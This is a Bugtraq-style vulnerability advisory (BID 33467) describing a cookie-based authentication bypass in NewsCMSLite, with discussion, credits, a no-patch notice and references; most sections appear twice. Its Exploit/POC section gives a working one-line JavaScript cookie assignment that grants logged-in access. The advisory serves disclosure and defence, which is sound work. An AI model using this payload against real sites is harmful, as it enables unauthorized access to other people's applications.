NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability
BID:33467
Info
NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability
| Bugtraq ID: | 33467 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 24 2006 12:00AM |
| Updated: | Jan 28 2009 09:59PM |
| Credit: | FarhadKey of KAPDA and AmnPardaz Security Research |
| Vulnerable: |
Katy Whitton NewsCMSLite 0 |
| Not Vulnerable: | |
Discussion
NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability
NewsCMSLite is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain unauthorized access to the affected application, which may aid in further attacks.
NewsCMSLite is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain unauthorized access to the affected application, which may aid in further attacks.
Exploit / POC
NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability
Attackers can exploit this issue via a browser.
Supplying the following is sufficient to exploit this issue:
javascript:document.cookie = "loggedIn=xY1zZoPQ; path=/"
Attackers can exploit this issue via a browser.
Supplying the following is sufficient to exploit this issue:
javascript:document.cookie = "loggedIn=xY1zZoPQ; path=/"
Solution / Fix
NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability
References:
References:
- [KAPDA::#44] - NewsCMSLite Login ByPass by Cookie (farhadkey yahoo com)
- NewsCMSLite Homepage (Katy Whitton)
- NewsCMSlite Insecure Cookie Handling ([email protected])